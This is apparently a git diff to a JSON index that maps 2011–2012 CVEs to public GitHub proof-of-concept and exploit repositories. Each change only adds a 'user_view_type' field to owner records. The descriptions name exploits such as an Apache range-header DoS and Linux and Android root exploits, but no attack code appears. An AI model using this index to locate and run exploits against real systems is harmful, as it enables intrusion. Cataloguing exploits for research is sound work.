b/2011/CVE-2011-3192.json @@ -7,7 +7,8 @@ "login": "tkisason", "id": 577380, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/577380?v=4", - "html_url": "https:\/\/github.com\/tkisason" + "html_url": "https:\/\/github.com\/tkisason", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tkisason\/KillApachePy", "description": "Python Apache Killer (Range Header DoS CVE-2011-3192)", @@ -37,7 +38,8 @@ "login": "limkokholefork", "id": 82161820, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82161820?v=4", - "html_url": "https:\/\/github.com\/limkokholefork" + "html_url": "https:\/\/github.com\/limkokholefork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/limkokholefork\/CVE-2011-3192", "description": "Apache Range Header DoS Exploit", @@ -67,7 +69,8 @@ "login": "stcmjp", "id": 29936047, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29936047?v=4", - "html_url": "https:\/\/github.com\/stcmjp" + "html_url": "https:\/\/github.com\/stcmjp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/stcmjp\/cve-2011-3192", "description": "This Repository use to test Apache Killer (cve-2011-3192).", @@ -97,7 +100,8 @@ "login": "futurezayka", "id": 114442776, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114442776?v=4", - "html_url": "https:\/\/github.com\/futurezayka" + "html_url": "https:\/\/github.com\/futurezayka", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/futurezayka\/CVE-2011-3192", "description": null, diff --git a/2011/CVE-2011-3368.json b/2011/CVE-2011-3368.json index 71c4fa95af..7d56730aff 100644 --- a/2011/CVE-2011-3368.json +++ b/2011/CVE-2011-3368.json @@ -7,7 +7,8 @@ "login": "SECFORCE", "id": 8157384, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", - "html_url": "https:\/\/github.com\/SECFORCE" + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2011-3368", "description": "CVE-2011-3368 exploit code", @@ -39,7 +40,8 @@ "login": "colorblindpentester", "id": 45195264, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45195264?v=4", - "html_url": "https:\/\/github.com\/colorblindpentester" + "html_url": "https:\/\/github.com\/colorblindpentester", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/colorblindpentester\/CVE-2011-3368", "description": "PoC Scan. (cve-2011-3368)", diff --git a/2011/CVE-2011-3389.json b/2011/CVE-2011-3389.json index 830b595255..f5386f5cbc 100644 --- a/2011/CVE-2011-3389.json +++ b/2011/CVE-2011-3389.json @@ -7,7 +7,8 @@ "login": "mpgn", "id": 5891788, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", - "html_url": "https:\/\/github.com\/mpgn" + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mpgn\/BEAST-PoC", "description": ":muscle: Proof Of Concept of the BEAST attack against SSL\/TLS CVE-2011-3389 :muscle:", diff --git a/2011/CVE-2011-3556.json b/2011/CVE-2011-3556.json index b5f5bfc711..8a30ed6ecd 100644 --- a/2011/CVE-2011-3556.json +++ b/2011/CVE-2011-3556.json @@ -7,7 +7,8 @@ "login": "sk4la", "id": 38187780, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38187780?v=4", - "html_url": "https:\/\/github.com\/sk4la" + "html_url": "https:\/\/github.com\/sk4la", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sk4la\/cve_2011_3556", "description": "Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).", diff --git a/2011/CVE-2011-3872.json b/2011/CVE-2011-3872.json index e5a948fc1c..2711f6f084 100644 --- a/2011/CVE-2011-3872.json +++ b/2011/CVE-2011-3872.json @@ -7,7 +7,8 @@ "login": "puppetlabs-toy-chest", "id": 88753164, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88753164?v=4", - "html_url": "https:\/\/github.com\/puppetlabs-toy-chest" + "html_url": "https:\/\/github.com\/puppetlabs-toy-chest", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/puppetlabs-toy-chest\/puppetlabs-cve20113872", "description": "Puppet Module to help fix and migrate a Puppet deployment (CVE-2011-3872)", diff --git a/2011/CVE-2011-4107.json b/2011/CVE-2011-4107.json index 704006ce4e..0c08bf2862 100644 --- a/2011/CVE-2011-4107.json +++ b/2011/CVE-2011-4107.json @@ -7,7 +7,8 @@ "login": "SECFORCE", "id": 8157384, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", - "html_url": "https:\/\/github.com\/SECFORCE" + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2011-4107", "description": "phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion", diff --git a/2011/CVE-2011-4862.json b/2011/CVE-2011-4862.json index cd0292014e..ac720b809f 100644 --- a/2011/CVE-2011-4862.json +++ b/2011/CVE-2011-4862.json @@ -7,7 +7,8 @@ "login": "hdbreaker", "id": 5799585, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5799585?v=4", - "html_url": "https:\/\/github.com\/hdbreaker" + "html_url": "https:\/\/github.com\/hdbreaker", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hdbreaker\/GO-CVE-2011-4862", "description": "Go Exploit for CVE-2011-4862", @@ -37,7 +38,8 @@ "login": "lol-fi", "id": 44122650, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44122650?v=4", - "html_url": "https:\/\/github.com\/lol-fi" + "html_url": "https:\/\/github.com\/lol-fi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lol-fi\/cve-2011-4862", "description": null, @@ -67,7 +69,8 @@ "login": "kpawar2410", "id": 51210677, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51210677?v=4", - "html_url": "https:\/\/github.com\/kpawar2410" + "html_url": "https:\/\/github.com\/kpawar2410", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kpawar2410\/CVE-2011-4862", "description": "Final Project for Security and Privacy CS 600.443", diff --git a/2011/CVE-2011-4919.json b/2011/CVE-2011-4919.json index 2d08240d20..404183b645 100644 --- a/2011/CVE-2011-4919.json +++ b/2011/CVE-2011-4919.json @@ -7,7 +7,8 @@ "login": "hartwork", "id": 1577132, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1577132?v=4", - "html_url": "https:\/\/github.com\/hartwork" + "html_url": "https:\/\/github.com\/hartwork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hartwork\/mpacktrafficripper", "description": ":unlock: CVE-2011-4919 -- mpack information disclosure demo (C)", diff --git a/2011/CVE-2011-5331.json b/2011/CVE-2011-5331.json index d99037fd16..3e83699a90 100644 --- a/2011/CVE-2011-5331.json +++ b/2011/CVE-2011-5331.json @@ -7,7 +7,8 @@ "login": "tomquinn8", "id": 74976996, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74976996?v=4", - "html_url": "https:\/\/github.com\/tomquinn8" + "html_url": "https:\/\/github.com\/tomquinn8", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tomquinn8\/CVE-2011-5331", "description": null, diff --git a/2012/CVE-2012-0002.json b/2012/CVE-2012-0002.json index d7d959efb5..a526c47d1d 100644 --- a/2012/CVE-2012-0002.json +++ b/2012/CVE-2012-0002.json @@ -7,7 +7,8 @@ "login": "zhangkaibin0921", "id": 82947463, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82947463?v=4", - "html_url": "https:\/\/github.com\/zhangkaibin0921" + "html_url": "https:\/\/github.com\/zhangkaibin0921", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zhangkaibin0921\/MS12-020-CVE-2012-0002", "description": null, diff --git a/2012/CVE-2012-0003.json b/2012/CVE-2012-0003.json index 00fdaa0943..7bec270495 100644 --- a/2012/CVE-2012-0003.json +++ b/2012/CVE-2012-0003.json @@ -7,7 +7,8 @@ "login": "k0keoyo", "id": 13257929, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13257929?v=4", - "html_url": "https:\/\/github.com\/k0keoyo" + "html_url": "https:\/\/github.com\/k0keoyo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/k0keoyo\/CVE-2012-0003_eXP", "description": null, diff --git a/2012/CVE-2012-0056.json b/2012/CVE-2012-0056.json index 5cf37ca12b..7d76675baa 100644 --- a/2012/CVE-2012-0056.json +++ b/2012/CVE-2012-0056.json @@ -7,7 +7,8 @@ "login": "srclib", "id": 1203705, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1203705?v=4", - "html_url": "https:\/\/github.com\/srclib" + "html_url": "https:\/\/github.com\/srclib", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/srclib\/CVE-2012-0056", "description": "Mempodipper, a linux local root exploit.", @@ -37,7 +38,8 @@ "login": "pythonone", "id": 14039690, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14039690?v=4", - "html_url": "https:\/\/github.com\/pythonone" + "html_url": "https:\/\/github.com\/pythonone", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pythonone\/CVE-2012-0056", "description": "linux 提权", diff --git a/2012/CVE-2012-0152.json b/2012/CVE-2012-0152.json index a29a7e891e..cd34037c4d 100644 --- a/2012/CVE-2012-0152.json +++ b/2012/CVE-2012-0152.json @@ -7,7 +7,8 @@ "login": "rutvijjethwa", "id": 19925118, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19925118?v=4", - "html_url": "https:\/\/github.com\/rutvijjethwa" + "html_url": "https:\/\/github.com\/rutvijjethwa", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rutvijjethwa\/RDP_jammer", "description": "CVE-2012-0152", diff --git a/2012/CVE-2012-0158.json b/2012/CVE-2012-0158.json index 8b41094814..0c1bfd35fd 100644 --- a/2012/CVE-2012-0158.json +++ b/2012/CVE-2012-0158.json @@ -7,7 +7,8 @@ "login": "RobertoLeonFR-ES", "id": 93054044, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93054044?v=4", - "html_url": "https:\/\/github.com\/RobertoLeonFR-ES" + "html_url": "https:\/\/github.com\/RobertoLeonFR-ES", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/RobertoLeonFR-ES\/Exploit-Win32.CVE-2012-0158.F.doc", "description": "the name of virus is the detection of microsoft defender, is the tipic antivirus", @@ -37,7 +38,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2012-0158-reproduction", "description": "CVE-2012-0158复现", diff --git a/2012/CVE-2012-1495.json b/2012/CVE-2012-1495.json index 428364f963..80a8a02adb 100644 --- a/2012/CVE-2012-1495.json +++ b/2012/CVE-2012-1495.json @@ -7,7 +7,8 @@ "login": "axelbankole", "id": 132128032, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132128032?v=4", - "html_url": "https:\/\/github.com\/axelbankole" + "html_url": "https:\/\/github.com\/axelbankole", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/axelbankole\/CVE-2012-1495-Webcalendar-", "description": null, diff --git a/2012/CVE-2012-1675.json b/2012/CVE-2012-1675.json index 1f77246934..2c9fb1423b 100644 --- a/2012/CVE-2012-1675.json +++ b/2012/CVE-2012-1675.json @@ -7,7 +7,8 @@ "login": "bongbongco", "id": 3170006, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3170006?v=4", - "html_url": "https:\/\/github.com\/bongbongco" + "html_url": "https:\/\/github.com\/bongbongco", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bongbongco\/CVE-2012-1675", "description": "Oracle Database TNS Listener Poison Attack Vulnerability", diff --git a/2012/CVE-2012-1723.json b/2012/CVE-2012-1723.json index e4241400ae..24dcd14cd7 100644 --- a/2012/CVE-2012-1723.json +++ b/2012/CVE-2012-1723.json @@ -7,7 +7,8 @@ "login": "EthanNJC", "id": 1881442, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1881442?v=4", - "html_url": "https:\/\/github.com\/EthanNJC" + "html_url": "https:\/\/github.com\/EthanNJC", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/EthanNJC\/CVE-2012-1723", "description": "Proof of concept exploit for CVE-2012-1723", diff --git a/2012/CVE-2012-1823.json b/2012/CVE-2012-1823.json index d4dd7e140a..208caf8b80 100644 --- a/2012/CVE-2012-1823.json +++ b/2012/CVE-2012-1823.json @@ -7,7 +7,8 @@ "login": "drone789", "id": 11384759, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11384759?v=4", - "html_url": "https:\/\/github.com\/drone789" + "html_url": "https:\/\/github.com\/drone789", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/drone789\/CVE-2012-1823", "description": null, @@ -37,7 +38,8 @@ "login": "tardummy01", "id": 22663702, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22663702?v=4", - "html_url": "https:\/\/github.com\/tardummy01" + "html_url": "https:\/\/github.com\/tardummy01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tardummy01\/oscp_scripts-1", "description": "First script, pgp-cgi-cve-2012-1823 BASH script", @@ -67,7 +69,8 @@ "login": "Unix13", "id": 52569108, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52569108?v=4", - "html_url": "https:\/\/github.com\/Unix13" + "html_url": "https:\/\/github.com\/Unix13", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Unix13\/metasploitable2", "description": "PHP-CGI-REMOTE_CVE-2012-1823, UnrealIRCd, MySQL, PostgreSQL and SSH bruteforce, VSFTPD2.3.4, samba CVE-2007-2447, JAVA RMI Server, distcc daemon, misconfigured NFS files, etc.", @@ -97,7 +100,8 @@ "login": "cyberharsh", "id": 57433814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", - "html_url": "https:\/\/github.com\/cyberharsh" + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberharsh\/PHP_CVE-2012-1823", "description": null, @@ -127,7 +131,8 @@ "login": "0xl0k1", "id": 141760484, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141760484?v=4", - "html_url": "https:\/\/github.com\/0xl0k1" + "html_url": "https:\/\/github.com\/0xl0k1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xl0k1\/CVE-2012-1823", "description": "PHP CGI Argument Injection.", diff --git a/2012/CVE-2012-1870.json b/2012/CVE-2012-1870.json index cdda575f8d..55ed000ef0 100644 --- a/2012/CVE-2012-1870.json +++ b/2012/CVE-2012-1870.json @@ -7,7 +7,8 @@ "login": "dja2TaqkGEEfA45", "id": 82131630, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4", - "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45" + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2012-1870", "description": null, diff --git a/2012/CVE-2012-1876.json b/2012/CVE-2012-1876.json index 4a3093b03e..b224530f2b 100644 --- a/2012/CVE-2012-1876.json +++ b/2012/CVE-2012-1876.json @@ -7,7 +7,8 @@ "login": "WizardVan", "id": 7245104, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7245104?v=4", - "html_url": "https:\/\/github.com\/WizardVan" + "html_url": "https:\/\/github.com\/WizardVan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/WizardVan\/CVE-2012-1876", "description": "CVE-2012-1876 simple calc exploitation ", @@ -37,7 +38,8 @@ "login": "ExploitCN", "id": 98264245, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98264245?v=4", - "html_url": "https:\/\/github.com\/ExploitCN" + "html_url": "https:\/\/github.com\/ExploitCN", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ExploitCN\/CVE-2012-1876-win7_x86_and_win7x64", "description": "CVE-2012-1876 win7_x86和x64平台分析,EXP、POC代码和分析文档", diff --git a/2012/CVE-2012-1889.json b/2012/CVE-2012-1889.json index 81feac6743..e6bae773f3 100644 --- a/2012/CVE-2012-1889.json +++ b/2012/CVE-2012-1889.json @@ -7,7 +7,8 @@ "login": "whu-enjoy", "id": 17870213, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17870213?v=4", - "html_url": "https:\/\/github.com\/whu-enjoy" + "html_url": "https:\/\/github.com\/whu-enjoy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/whu-enjoy\/CVE-2012-1889", "description": "这里保存着我学习CVE-2012-1889这个漏洞的利用所用到的文件", @@ -37,7 +38,8 @@ "login": "l-iberty", "id": 15071029, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15071029?v=4", - "html_url": "https:\/\/github.com\/l-iberty" + "html_url": "https:\/\/github.com\/l-iberty", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/l-iberty\/cve-2012-1889", "description": null, diff --git a/2012/CVE-2012-2122.json b/2012/CVE-2012-2122.json index a46d88e77d..9b3d8bced7 100644 --- a/2012/CVE-2012-2122.json +++ b/2012/CVE-2012-2122.json @@ -7,7 +7,8 @@ "login": "Avinza", "id": 4388589, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4388589?v=4", - "html_url": "https:\/\/github.com\/Avinza" + "html_url": "https:\/\/github.com\/Avinza", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Avinza\/CVE-2012-2122-scanner", "description": "This is used to scan for CVE-2012-2122 vulnerable servers.", @@ -37,7 +38,8 @@ "login": "cyberharsh", "id": 57433814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", - "html_url": "https:\/\/github.com\/cyberharsh" + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberharsh\/Oracle-mysql-CVE-2012-2122", "description": null, @@ -67,7 +69,8 @@ "login": "zhangkaibin0921", "id": 82947463, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82947463?v=4", - "html_url": "https:\/\/github.com\/zhangkaibin0921" + "html_url": "https:\/\/github.com\/zhangkaibin0921", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zhangkaibin0921\/CVE-2012-2122", "description": null, diff --git a/2012/CVE-2012-2593.json b/2012/CVE-2012-2593.json index 60851dcd67..715a4d158d 100644 --- a/2012/CVE-2012-2593.json +++ b/2012/CVE-2012-2593.json @@ -7,7 +7,8 @@ "login": "AndrewTrube", "id": 53106750, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53106750?v=4", - "html_url": "https:\/\/github.com\/AndrewTrube" + "html_url": "https:\/\/github.com\/AndrewTrube", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AndrewTrube\/CVE-2012-2593", "description": "Atmail XSS-CSRF-RCE Exploit Chain", diff --git a/2012/CVE-2012-2661.json b/2012/CVE-2012-2661.json index 5786175d0b..5b89d2463d 100644 --- a/2012/CVE-2012-2661.json +++ b/2012/CVE-2012-2661.json @@ -7,7 +7,8 @@ "login": "r4x0r1337", "id": 99073650, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99073650?v=4", - "html_url": "https:\/\/github.com\/r4x0r1337" + "html_url": "https:\/\/github.com\/r4x0r1337", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/r4x0r1337\/-CVE-2012-2661-ActiveRecord-SQL-injection-", "description": null, diff --git a/2012/CVE-2012-2688.json b/2012/CVE-2012-2688.json index 4b3a06b0d8..83c870d10e 100644 --- a/2012/CVE-2012-2688.json +++ b/2012/CVE-2012-2688.json @@ -7,7 +7,8 @@ "login": "shelld3v", "id": 59408894, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59408894?v=4", - "html_url": "https:\/\/github.com\/shelld3v" + "html_url": "https:\/\/github.com\/shelld3v", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shelld3v\/CVE-2012-2688", "description": "A CVE-2012-2688 shell", diff --git a/2012/CVE-2012-2982.json b/2012/CVE-2012-2982.json index 7cc71098c2..e95f7339f0 100644 --- a/2012/CVE-2012-2982.json +++ b/2012/CVE-2012-2982.json @@ -7,7 +7,8 @@ "login": "cd6629", "id": 63489620, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489620?v=4", - "html_url": "https:\/\/github.com\/cd6629" + "html_url": "https:\/\/github.com\/cd6629", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cd6629\/CVE-2012-2982-Python-PoC", "description": "This was converted from a metasploit module as an exercise for OSCP studying", @@ -37,7 +38,8 @@ "login": "OstojaOfficial", "id": 21225822, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21225822?v=4", - "html_url": "https:\/\/github.com\/OstojaOfficial" + "html_url": "https:\/\/github.com\/OstojaOfficial", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/OstojaOfficial\/CVE-2012-2982", "description": "Python exploit for CVE-2012-2982", @@ -67,7 +69,8 @@ "login": "AlexJS6", "id": 63366907, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63366907?v=4", - "html_url": "https:\/\/github.com\/AlexJS6" + "html_url": "https:\/\/github.com\/AlexJS6", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AlexJS6\/CVE-2012-2982_Python", "description": "PoC Python script as an exercice from tryhackme.", @@ -97,7 +100,8 @@ "login": "Ari-Weinberg", "id": 67128976, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67128976?v=4", - "html_url": "https:\/\/github.com\/Ari-Weinberg" + "html_url": "https:\/\/github.com\/Ari-Weinberg", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Ari-Weinberg\/CVE-2012-2982", "description": "Exploit for CVE-2012-2982", @@ -127,7 +131,8 @@ "login": "JohnHammond", "id": 6288722, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6288722?v=4", - "html_url": "https:\/\/github.com\/JohnHammond" + "html_url": "https:\/\/github.com\/JohnHammond", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JohnHammond\/CVE-2012-2982", "description": "A Python replicated exploit for Webmin 1.580 \/file\/show.cgi Remote Code Execution", @@ -157,7 +162,8 @@ "login": "R00tendo", "id": 72181445, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72181445?v=4", - "html_url": "https:\/\/github.com\/R00tendo" + "html_url": "https:\/\/github.com\/R00tendo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/R00tendo\/CVE-2012-2982", "description": null, @@ -189,7 +195,8 @@ "login": "blu3ming", "id": 25083316, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25083316?v=4", - "html_url": "https:\/\/github.com\/blu3ming" + "html_url": "https:\/\/github.com\/blu3ming", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/blu3ming\/CVE-2012-2982", "description": "POC en Python para el CVE-2012-2982 mejorado del original por el usuario @OstojaOfficial", @@ -219,7 +226,8 @@ "login": "0xF331-D3AD", "id": 107276306, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107276306?v=4", - "html_url": "https:\/\/github.com\/0xF331-D3AD" + "html_url": "https:\/\/github.com\/0xF331-D3AD", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xF331-D3AD\/CVE-2012-2982", "description": null, @@ -249,7 +257,8 @@ "login": "0xTas", "id": 103238549, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103238549?v=4", - "html_url": "https:\/\/github.com\/0xTas" + "html_url": "https:\/\/github.com\/0xTas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xTas\/CVE-2012-2982", "description": "An exploit for CVE-2012-2982 implemented in Rust", @@ -285,7 +294,8 @@ "login": "LeDucKhiem", "id": 109100186, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109100186?v=4", - "html_url": "https:\/\/github.com\/LeDucKhiem" + "html_url": "https:\/\/github.com\/LeDucKhiem", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LeDucKhiem\/CVE-2012-2982", "description": "my own script in python to exploit vulnerable (It based on TryHackMe Intro PoC Scripting room) ", @@ -315,7 +325,8 @@ "login": "CpyRe", "id": 46545030, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46545030?v=4", - "html_url": "https:\/\/github.com\/CpyRe" + "html_url": "https:\/\/github.com\/CpyRe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/CpyRe\/CVE-2012-2982", "description": "Practice POC scripting in Tryhackme’s intro poc scripting room (For Linux)", @@ -345,7 +356,8 @@ "login": "Shadow-Spinner", "id": 58800445, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58800445?v=4", - "html_url": "https:\/\/github.com\/Shadow-Spinner" + "html_url": "https:\/\/github.com\/Shadow-Spinner", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Shadow-Spinner\/CVE-2012-2982_python", "description": null, @@ -375,7 +387,8 @@ "login": "elliotosama", "id": 168604968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168604968?v=4", - "html_url": "https:\/\/github.com\/elliotosama" + "html_url": "https:\/\/github.com\/elliotosama", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/elliotosama\/CVE-2012-2982", "description": null, diff --git a/2012/CVE-2012-3137.json b/2012/CVE-2012-3137.json index b5065ba73f..d65cdb81ea 100644 --- a/2012/CVE-2012-3137.json +++ b/2012/CVE-2012-3137.json @@ -7,7 +7,8 @@ "login": "hantwister", "id": 1304167, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1304167?v=4", - "html_url": "https:\/\/github.com\/hantwister" + "html_url": "https:\/\/github.com\/hantwister", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hantwister\/o5logon-fetch", "description": "Attempts to exploit CVE-2012-3137 on vulnerable Oracle servers", @@ -37,7 +38,8 @@ "login": "r1-", "id": 3379185, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3379185?v=4", - "html_url": "https:\/\/github.com\/r1-" + "html_url": "https:\/\/github.com\/r1-", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/r1-\/cve-2012-3137", "description": "Exploit for cve-2012-3137 Oracle challenge", diff --git a/2012/CVE-2012-3153.json b/2012/CVE-2012-3153.json index 96160eecec..c52570a344 100644 --- a/2012/CVE-2012-3153.json +++ b/2012/CVE-2012-3153.json @@ -7,7 +7,8 @@ "login": "Mekanismen", "id": 6065905, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6065905?v=4", - "html_url": "https:\/\/github.com\/Mekanismen" + "html_url": "https:\/\/github.com\/Mekanismen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Mekanismen\/pwnacle-fusion", "description": "Automated exploit for CVE-2012-3153 \/ CVE-2012-3152", diff --git a/2012/CVE-2012-3716.json b/2012/CVE-2012-3716.json index 23d7aac6a0..be43937734 100644 --- a/2012/CVE-2012-3716.json +++ b/2012/CVE-2012-3716.json @@ -7,7 +7,8 @@ "login": "d4rkcat", "id": 5111270, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5111270?v=4", - "html_url": "https:\/\/github.com\/d4rkcat" + "html_url": "https:\/\/github.com\/d4rkcat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/d4rkcat\/killosx", "description": "use the Apple CoreText exploit (CVE-2012-3716) and launch an AP to affect all devices within wifi range", diff --git a/2012/CVE-2012-4220.json b/2012/CVE-2012-4220.json index f38a7f37b7..a55c619031 100644 --- a/2012/CVE-2012-4220.json +++ b/2012/CVE-2012-4220.json @@ -7,7 +7,8 @@ "login": "hiikezoe", "id": 188175, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188175?v=4", - "html_url": "https:\/\/github.com\/hiikezoe" + "html_url": "https:\/\/github.com\/hiikezoe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hiikezoe\/diaggetroot", "description": "Obtain root access through CVE-2012-4220", @@ -37,7 +38,8 @@ "login": "poliva", "id": 1238981, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1238981?v=4", - "html_url": "https:\/\/github.com\/poliva" + "html_url": "https:\/\/github.com\/poliva", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/poliva\/root-zte-open", "description": "exploit for CVE-2012-4220 working on zte-open", diff --git a/2012/CVE-2012-4431.json b/2012/CVE-2012-4431.json index 6f7da93eb1..3e10d86797 100644 --- a/2012/CVE-2012-4431.json +++ b/2012/CVE-2012-4431.json @@ -7,7 +7,8 @@ "login": "imjdl", "id": 31382943, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31382943?v=4", - "html_url": "https:\/\/github.com\/imjdl" + "html_url": "https:\/\/github.com\/imjdl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/imjdl\/CVE-2012-4431", "description": null, diff --git a/2012/CVE-2012-4681.json b/2012/CVE-2012-4681.json index 18dfef9673..af3e447a0c 100644 --- a/2012/CVE-2012-4681.json +++ b/2012/CVE-2012-4681.json @@ -7,7 +7,8 @@ "login": "benjholla", "id": 797245, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/797245?v=4", - "html_url": "https:\/\/github.com\/benjholla" + "html_url": "https:\/\/github.com\/benjholla", + "user_view_type": "public" }, "html_url": 